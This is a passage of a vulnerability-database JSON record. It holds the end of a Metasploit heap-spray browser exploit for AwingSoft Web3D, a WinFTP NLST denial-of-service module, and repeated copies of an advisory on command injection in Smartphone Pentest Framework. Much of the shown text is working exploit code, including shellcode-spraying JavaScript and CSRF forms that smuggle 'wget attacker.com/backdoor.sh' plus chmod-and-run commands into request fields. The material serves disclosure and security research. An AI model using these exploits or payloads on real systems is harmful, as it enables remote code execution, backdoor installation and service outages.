1024,\n 'BadChars' => \"\\x00\\x09\\x0a\\x0d'\\\\\",\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # data segment size: 76180\n # crasher offsets: 2640, 2712, 8984, 68420, 68424\n [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C, 'Offset' => 8984 } ]\n ],\n 'DisclosureDate' => 'Jul 10 2009',\n 'DefaultTarget' => 0))\n end\n\n def on_request_uri(cli, request)\n\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Encode the shellcode\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Setup exploit buffers\n nops \t = Rex::Text.to_unescape([target.ret].pack('V'))\n ret \t = Rex::Text.uri_encode([target.ret].pack('V'))\n blocksize = 0x40000\n fillto = 500\n offset \t = target['Offset']\n\n # Randomize the javascript variable names\n winds3d = rand_text_alpha(rand(100) + 1)\n j_shellcode = rand_text_alpha(rand(100) + 1)\n j_nops = rand_text_alpha(rand(100) + 1)\n j_ret = rand_text_alpha(rand(100) + 1)\n j_headersize = rand_text_alpha(rand(100) + 1)\n j_slackspace = rand_text_alpha(rand(100) + 1)\n j_fillblock = rand_text_alpha(rand(100) + 1)\n j_block = rand_text_alpha(rand(100) + 1)\n j_memory = rand_text_alpha(rand(100) + 1)\n j_counter = rand_text_alpha(rand(30) + 2)\n\n # we must leave the page, so we use http-equiv and javascript refresh methods\n html = %Q|<html>\n<head><meta http-equiv=\"refresh\" content=\"1;URL=#{get_resource}\"></head>\n<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903' id='#{winds3d}'></object>\n<script>\n#{j_shellcode}=unescape('#{shellcode}');\n#{j_nops}=unescape('#{nops}');\n#{j_headersize}=20;\n#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;\nwhile(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};\n#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});\n#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});\nwhile(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};\n#{j_memory}=new Array();\nfor(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};\n\nvar #{j_ret} = unescape('#{ret}');\nwhile (#{j_ret}.length <= #{offset}) { #{j_ret} = #{j_ret} + unescape('#{ret}'); }\n#{winds3d}.SceneURL = #{j_ret};\nsetTimeout('window.location = \"#{get_resource}\";', 500);\n</script>\n</html>\n|\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response(cli, html, { 'Content-Type' => 'text/html' })\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/awingsoft_web3d_bof.rb"}, {"lastseen": "2019-11-18T03:37:58", "bulletinFamily": "exploit", "description": "This module is a very rough port of Julien Bedard's PoC. You need a valid login, but even anonymous can do it if it has permission to call NLST.\n", "modified": "2017-07-24T13:26:21", "published": "2008-09-30T23:28:24", "id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/WINFTP230_NLST", "href": "", "type": "metasploit", "title": "WinFTP 2.3.0 NLST Denial of Service", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WinFTP 2.3.0 NLST Denial of Service',\n 'Description' => %q{\n This module is a very rough port of Julien Bedard's\n PoC. You need a valid login, but even anonymous can\n do it if it has permission to call NLST.\n },\n 'Author' => 'kris katterjohn',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2008-5666' ],\n [ 'OSVDB', '49043' ],\n [ 'EDB', '6581' ]\n ],\n 'DisclosureDate' => 'Sep 26 2008'))\n end\n\n def run\n return unless connect_login\n\n # NLST has to follow a PORT or PASV\n resp = send_cmd(['PASV'])\n\n raw_send(\"NLST #{'..?' * 35000}\\r\\n\")\n\n disconnect\n end\nend\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:49", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2012-12-11T00:00:00", "published": "2012-12-11T00:00:00", "id": "SECURITYVULNS:VULN:12773", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12773", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23127\r\nProduct: Smartphone Pentest Framework (SPF)\r\nVendor: Bulb Security LLC\r\nVulnerable Versions: 0.1.3, 0.1.4 and probably prior\r\nTested Versions: 0.1.3, 0.1.4\r\nVendor Notification: November 19, 2012 \r\nPublic Disclosure: December 10, 2012 \r\nVulnerability Type: OS Command Injection [CWE-78]\r\nCVE Reference: CVE-2012-5878\r\nCVSSv2 Base Score: 8.3 (AV:A/AC:L/Au:N/C:C/I:C/A:C)\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple command execution vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine remotely. \r\n\r\nSimilar vulnerabilities were discovered (https://www.htbridge.com/advisory/HTB23123 , CVE-2012-5693) in the previous version (0.1.2) of SPF and were patched by vendor. \r\n\r\nHowever, multiple CSRF vulnerabilities (HTB23123, CVE-2012-5695) were not patched by the vendor. Therefore even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for the majority of pentesters) the vulnerabilities can still be easily exploited via a local/internal network, or even from the Internet via CSRF vector. In default installation of Smartphone Pentest Framework its web server port and application path of its GUI are easily predictable: localhost:80/frameworkgui/\r\n\r\nPlease refer to HTB23123 advisory (https://www.htbridge.com/advisory/HTB23122) for detailed attack scenarios examples.\r\n\r\n\r\n1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5878\r\n\r\nMultiple Perl scripts in the "/frameworkgui/" directory do not perform sanitation of user-supplied input passed as argument to the "system()" function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server user. \r\n\r\n1.1 The vulnerability exists in "SEAttack.pl" script due to insufficient validation of user-supplied input passed via the "hostingPath" parameter. The vulnerability can be exploited remotely via CSRF vector. \r\n\r\nThe PoC code below will download a backdoor located on 'attacker.com' and run it on pentester's machine with privileges of the web server. Despite relatively low privileges attacker can always try to download all files accessible to him and/or escalate privileges to get remote root access to the system. \r\n\r\n\r\n<form action="http://localhost/cgi-bin/frameworkgui/SEAttack.pl" method="post" name=f1>\r\n<input type="hidden" name="platformDD2" value='android' />\r\n<input type="hidden" name="hostingPath" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.ch && ./backdoor.sh & ' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.2 The vulnerability exists in "CSAttack.pl" script due to insufficient validation of user-supplied input passed via the "hostingPath" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action="http://localhost/cgi-bin/frameworkgui/CSAttack.pl" method="post" name=f1>\r\n<input type="hidden" name="hostingPath" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.3 The vulnerability exists in "attachMobileModem.pl" script due to insufficient validation of user-supplied input passed via the "appURLPath" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action="http://localhost/cgi-bin/frameworkgui/attachMobileModem.pl" method="post" name=f1>\r\n<input type="hidden" name="appURLPath" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.4 The vulnerability exists in "guessPassword.pl" script due to insufficient validation of user-supplied input passed via the "ipAddressTB" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action="http://localhost/cgi-bin/frameworkgui/guessPassword.pl" method="post" name=f1>\r\n<input type="hidden" name="ipAddressTB" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type="submit" id="btn">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nOn December 5, 2012 vendor replied that vulnerabilities are patched. However, on the Disclosure date version 0.1.4 was still found to be vulnerable.\r\n\r\nAs a temporary solution remove or disable SPF's GUI.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23127 - https://www.htbridge.com/advisory/HTB23127 - Multiple Vulnerabilities in Smartphone Pentest Framework (SPF).\r\n[2] Smartphone Pentest Framework (SPF) - http://www.bulbsecurity.com/smartphone-pentest-framework/ - Smartphone Pentest Framework is an open source security tool, designed to aid in assessing the security posture of smartphones in an environment.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "modified": "2012-12-11T00:00:00", "published": "2012-12-11T00:00:00", "id": "SECURITYVULNS:DOC:28856", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28856", "title": "Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "Antivirus crash on scanning malformed PE files.", "modified": "2006-03-09T00:00:00", "published": "2006-03-09T00:00:00", "id": "SECURITYVULNS:VULN:5878", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5878", "title": "Norton Antivirus DoS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:14", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nServ-U FTP Server Potential Denial of Service Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA17409\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/17409/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nDoS\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nServ-U FTP Server 6.x\r\nhttp://secunia.com/product/5878/\r\n\r\nDESCRIPTION:\r\nA vulnerability has been reported in Serv-U, which potentially can be\r\nexploited by malicious people to cause a DoS (Denial of Service).\r\n\r\nThe vulnerability is caused due to an unspecified error and may be\r\nexploited to remotely crash the server via certain malformed\r\npackets.\r\n\r\nNOTE: The ZLib and OpenSSL libraries have also been changed to\r\nversion v1.2.3 and v0.9.8a respectively.\r\n\r\nSOLUTION:\r\nUpdate to version 6.1.0.4.\r\nhttp://www.serv-u.com/dn.asp\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by vendor.\r\n\r\nORIGINAL ADVISORY:\r\nhttp://www.serv-u.com/releasenotes.asp\r\n\r\nOTHER REFERENCES:\r\nSA17151:\r\nhttp://secunia.com/advisories/17151/\r\n\r\nSA16137:\r\nhttp://secunia.com/advisories/16137/\r\n\r\nSA15949:\r\nhttp://secunia.com/advisories/15949/\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-11-04T00:00:00", "published": "2005-11-04T00:00:00", "id": "SECURITYVULNS:DOC:10123", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10123", "title": "[SA17409] Serv-U FTP Server Potential Denial of Service Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "Shell characters problem allow javacript execution in local zone.", "modified": "2004-03-10T00:00:00", "published": "2004-03-10T00:00:00", "id": "SECURITYVULNS:VULN:3512", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:3512", "title": "Microsoft Outlook shell characters problem", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:22", "bulletinFamily": "exploit", "description": "", "modified": "2012-12-11T00:00:00", "published": "2012-12-11T00:00:00", "href": "https://packetstormsecurity.com/files/118743/Smartphone-Pentest-Framework-0.1.3-0.1.4-Command-Injection.html", "id": "PACKETSTORM:118743", "title": "Smartphone Pentest Framework 0.1.3 / 0.1.4 Command Injection", "type": "packetstorm", "sourceData": "`Advisory ID: HTB23127 \nProduct: Smartphone Pentest Framework (SPF) \nVendor: Bulb Security LLC \nVulnerable Versions: 0.1.3, 0.1.4 and probably prior \nTested Versions: 0.1.3, 0.1.4 \nVendor Notification: November 19, 2012 \nPublic Disclosure: December 10, 2012 \nVulnerability Type: OS Command Injection [CWE-78] \nCVE Reference: CVE-2012-5878 \nCVSSv2 Base Score: 8.3 (AV:A/AC:L/Au:N/C:C/I:C/A:C) \nRisk Level: High \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered multiple command execution vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine remotely. \n \nSimilar vulnerabilities were discovered (https://www.htbridge.com/advisory/HTB23123 , CVE-2012-5693) in the previous version (0.1.2) of SPF and were patched by vendor. \n \nHowever, multiple CSRF vulnerabilities (HTB23123, CVE-2012-5695) were not patched by the vendor. Therefore even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for the majority of pentesters) the vulnerabilities can still be easily exploited via a local/internal network, or even from the Internet via CSRF vector. In default installation of Smartphone Pentest Framework its web server port and application path of its GUI are easily predictable: localhost:80/frameworkgui/ \n \nPlease refer to HTB23123 advisory (https://www.htbridge.com/advisory/HTB23122) for detailed attack scenarios examples. \n \n \n1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5878 \n \nMultiple Perl scripts in the \"/frameworkgui/\" directory do not perform sanitation of user-supplied input passed as argument to the \"system()\" function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server user. \n \n1.1 The vulnerability exists in \"SEAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector. \n \nThe PoC code below will download a backdoor located on 'attacker.com' and run it on pentester's machine with privileges of the web server. Despite relatively low privileges attacker can always try to download all files accessible to him and/or escalate privileges to get remote root access to the system. \n \n \n<form action=\"http://localhost/cgi-bin/frameworkgui/SEAttack.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"platformDD2\" value='android' /> \n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.ch && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n \n \n1.2 The vulnerability exists in \"CSAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n \n \n<form action=\"http://localhost/cgi-bin/frameworkgui/CSAttack.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n \n \n1.3 The vulnerability exists in \"attachMobileModem.pl\" script due to insufficient validation of user-supplied input passed via the \"appURLPath\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n \n \n<form action=\"http://localhost/cgi-bin/frameworkgui/attachMobileModem.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"appURLPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n \n \n1.4 The vulnerability exists in \"guessPassword.pl\" script due to insufficient validation of user-supplied input passed via the \"ipAddressTB\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n \n \n<form action=\"http://localhost/cgi-bin/frameworkgui/guessPassword.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"ipAddressTB\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nOn December 5, 2012 vendor replied that vulnerabilities are patched. However, on the Disclosure date version 0.1.4 was still found to be vulnerable. \n \nAs a temporary solution remove or disable SPF's GUI. \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23127 - https://www.htbridge.com/advisory/HTB23127 - Multiple Vulnerabilities in Smartphone Pentest Framework (SPF). \n[2] Smartphone Pentest Framework (SPF) - http://www.bulbsecurity.com/smartphone-pentest-framework/ - Smartphone Pentest Framework is an open source security tool, designed to aid in assessing the security posture of smartphones in an environment. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/118743/smartphonepentestfw-exec.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-04T07:20:47", "bulletinFamily": "exploit", "description": "Smartphone Pentest Framework Multiple Remote Command Execution Vulnerabilities. CVE-2012-5878. Webapps exploit for cgi platform", "modified": "2012-12-10T00:00:00", "published": "2012-12-10T00:00:00", "id": "EDB-ID:38114", "href": "https://www.exploit-db.com/exploits/38114/", "type": "exploitdb", "title": "Smartphone Pentest Framework Multiple Remote Command Execution Vulnerabilities", "sourceData": "source: http://www.securityfocus.com/bid/56881/info\r\n\r\nSmartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.\r\n\r\nRemote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.\r\n\r\nSmartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected. \r\n\r\n1.\r\n\r\n<form action=\"http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl\" \r\nmethod=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"platformDD2\" value='android' />\r\n<input type=\"hidden\" name=\"hostingPath\" value='a & wget \r\nhttp://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch && \r\n./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n2. \r\n\r\n<form action=\"http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl\" \r\nmethod=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"hostingPath\" value='a & wget \r\nhttp://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && \r\n./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n3.\r\n\r\n<form \r\naction=\"http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl\" \r\nmethod=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"appURLPath\" value='a & wget \r\nhttp://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && \r\n./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n4.\r\n\r\n<form \r\naction=\"http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl\" \r\nmethod=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"ipAddressTB\" value='a & wget \r\nhttp://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh && \r\n./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/38114/"}], "htbridge": [{"lastseen": "2019-04-10T17:55:38", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered multiple command execution vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine remotely. \nSimilar vulnerabilities were discovered (https://www.immuniweb.com/advisory/HTB23123, CVE-2012-5693) in the previous version (0.1.2) of SPF and were patched by vendor. \nHowever, multiple CSRF vulnerabilities (HTB23123, CVE-2012-5695) were not patched by the vendor. Therefore even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for the majority of pentesters) the vulnerabilities can still be easily exploited via a local/internal network, or even from the Internet via CSRF vector. In default installation of Smartphone Pentest Framework its web server port and application path of its GUI are easily predictable: localhost:80/frameworkgui/ \nPlease refer to HTB23123 advisory (https://www.immuniweb.com/advisory/HTB23123) for detailed attack scenarios examples. \n \n1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5878 \nMultiple Perl scripts in the \"/frameworkgui/\" directory do not perform sanitation of user-supplied input passed as argument to the \"system()\" function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server user. \n1.1 The vulnerability exists in \"SEAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector. \nThe PoC code below will download a backdoor located on 'attacker.com' and run it on pentester's machine with privileges of the web server. Despite relatively low privileges attacker can always try to download all files accessible to him and/or escalate privileges to get remote root access to the system. \n<form action=\"http://localhost/cgi-bin/frameworkgui/SEAttack.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"platformDD2\" value='android' /> \n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n1.2 The vulnerability exists in \"CSAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n<form action=\"http://localhost/cgi-bin/frameworkgui/CSAttack.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n \n1.3 The vulnerability exists in \"attachMobileModem.pl\" script due to insufficient validation of user-supplied input passed via the \"appURLPath\" parameter. The vulnerability can be exploited remotely via CSRF vector: \n<form action=\"http://localhost/cgi-bin/frameworkgui/attachMobileModem.pl\" method=\"post\" name=f1> \n<input type=\"hidden\" name=\"appURLPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' /> \n<input type=\"submit\" id=\"btn\"> \n</form> \n<script> \ndocument.f1.Submit() \n</script> \n\n", "modified": "2012-12-11T00:00:00", "published": "2012-11-19T00:00:00", "id": "HTB23127", "href": "https://www.htbridge.com/advisory/HTB23127", "type": "htbridge", "title": "Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF)", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C/"}}]}